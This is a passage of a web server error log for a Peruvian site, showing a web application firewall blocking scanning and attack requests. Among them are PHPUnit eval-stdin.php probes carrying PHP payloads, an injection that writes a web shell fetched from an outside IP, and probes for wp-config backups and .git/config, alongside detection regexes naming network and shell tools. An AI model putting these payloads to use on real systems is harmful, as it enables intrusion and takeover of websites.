"(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/wp-content/wp-plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHEYaRI7UXDVsPPl7t7QAAAMo"] [Sat Jun 03 08:58:41.630717 2023] [:error] [pid 5761:tid 140634795005696] [client 54.227.63.8:48352] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHEYaRI7UXDVsPPl7t7AAAAMU"] [Sat Jun 03 08:58:41.620954 2023] [:error] [pid 5761:tid 140634911876864] [client 54.227.63.8:48356] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHEYaRI7UXDVsPPl7t7gAAAMA"] [Sat Jun 03 08:58:44.386606 2023] [:error] [pid 5348:tid 140634727864064] [client 54.227.63.8:48362] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHFJijGVlckqbyEBeThQAAAI0"] [Sat Jun 03 08:58:44.387546 2023] [:error] [pid 5348:tid 140634727864064] [client 54.227.63.8:48364] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/sites/default/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHFJijGVlckqbyEBeThgAAAI0"] [Sat Jun 03 08:58:44.388443 2023] [:error] [pid 5348:tid 140634727864064] [client 54.227.63.8:48366] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHFJijGVlckqbyEBeThwAAAI0"] [Sat Jun 03 08:58:47.551583 2023] [:error] [pid 5348:tid 140634702685952] [client 54.227.63.8:48400] [client 54.227.63.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: | echo found within ARGS_NAMES:<?php echo 'RCE_VULN|'; echo php_uname();?>: <?php echo rce_vuln| echo php_uname() ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZHtHF5ijGVlckqbyEBeTiwAAAJA"] [Sat Jun 03 16:48:07.791746 2023] [autoindex:error] [pid 5348:tid 140634753042176] [client 20.198.77.190:48188] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jun 04 03:19:21.695552 2023] [ssl:warn] [pid 22203:tid 140171208955776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:21.841597 2023] [ssl:warn] [pid 22204:tid 140171208955776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:22.086973 2023] [ssl:warn] [pid 22204:tid 140171208955776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:24.092103 2023] [ssl:warn] [pid 22204:tid 140171208955776] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:26.346644 2023] [ssl:warn] [pid 22651:tid 140282732808064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:26.483668 2023] [ssl:warn] [pid 22652:tid 140282732808064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 03:19:27.094181 2023] [ssl:warn] [pid 22652:tid 140282732808064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Jun 04 10:58:37.426200 2023] [autoindex:error] [pid 22804:tid 140282397968128] [client 20.219.51.255:45150] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Jun 04 18:07:24.812920 2023] [autoindex:error] [pid 22804:tid 140282347611904] [client 144.126.144.226:45470] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Jun 05 03:49:19.120909 2023] [ssl:warn] [pid 16011:tid 139792257746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 03:49:19.277992 2023] [ssl:warn] [pid 16012:tid 139792257746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 03:49:19.659921 2023] [ssl:warn] [pid 16012:tid 139792257746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 03:49:21.259922 2023] [ssl:warn] [pid 16012:tid 139792257746816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 03:49:23.869091 2023] [ssl:warn] [pid 16457:tid 140145400067968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 03:49:24.012409 2023] [ssl:warn] [pid 16458:tid 140145400067968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Jun 05 13:06:54.265609 2023] [:error] [pid 16478:tid 140144984127232] [client 43.130.145.17:51520] [client 43.130.145.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZH4kPkHDbbVIwBODqvTGOgAAABQ"], referer: www.google.com [Mon Jun 05 14:47:33.354177 2023] [autoindex:error] [pid 16479:tid 140145017698048] [client 43.134.250.241:55866] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/06/05 21:07:46 [error] 16411#16411: *433214 access forbidden by rule, client: 209.141.56.96, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Jun 05 22:40:34.745812 2023] [autoindex:error] [pid 22425:tid 140145042876160] [client 20.219.48.42:46928] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jun 06 02:16:56.379984 2023] [autoindex:error] [pid 16478:tid 140145059661568] [client 43.130.123.64:57544] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jun 06 03:49:21.390582 2023] [ssl:warn] [pid 19990:tid 140506452383616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 03:49:21.526281 2023] [ssl:warn] [pid 19991:tid 140506452383616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 03:49:22.052000 2023] [ssl:warn] [pid 19991:tid 140506452383616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 03:49:24.640574 2023] [ssl:warn] [pid 19991:tid 140506452383616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 03:49:28.380814 2023] [ssl:warn] [pid 20441:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 03:49:28.536799 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 17:09:05.058413 2023] [:error] [pid 20463:tid 140308689200896] [client 178.159.37.25:52740] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZH-ugb885uWWNp2aabJ84gAAAEA"] [Tue Jun 06 17:09:05.077205 2023] [:error] [pid 20463:tid 140308436141824] [client 178.159.37.25:52750] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "ZH-ugb885uWWNp2aabJ85gAAAFY"] [Tue Jun 06 17:09:05.089302 2023] [:error] [pid 20462:tid 140308587210496] [client 178.159.37.25:52758] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZH-ugS1Lty_0yoAq6DBQIQAAAAQ"] [Tue Jun 06 17:09:05.135399 2023] [:error] [pid 20463:tid 140308486498048] [client 178.159.37.25:52762] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZH-ugb885uWWNp2aabJ86AAAAFA"] [Tue Jun 06 17:09:05.424612 2023] [:error] [pid 20463:tid 140308689200896] [client 178.159.37.25:52888] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZH-ugb885uWWNp2aabJ8-QAAAEA"] [Tue Jun 06 17:09:12.978527 2023] [:error] [pid 7018:tid 140308528461568] [client 178.159.37.25:52932] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "ZH-uhJ237lkyeYBIHIh_pQAAAUs"] [Tue Jun 06 17:09:13.091828 2023] [:error] [pid 7018:tid 140308578817792] [client 178.159.37.25:52936] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "ZH-uhJ237lkyeYBIHIh_mgAAAUU"] [Tue Jun 06 21:38:16.882478 2023] [autoindex:error] [pid 6944:tid 140308419356416] [client 20.219.196.55:37934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Jun 06 23:22:08.899091 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:22:35.215445 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:23:02.017642 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:23:09.045696 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:23:28.081592 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:23:50.369868 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:24:17.942770 2023] [ssl:warn] [pid 20442:tid 140308869822336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Jun 06 23:24:34.008753 2023] [ssl:warn] [pid 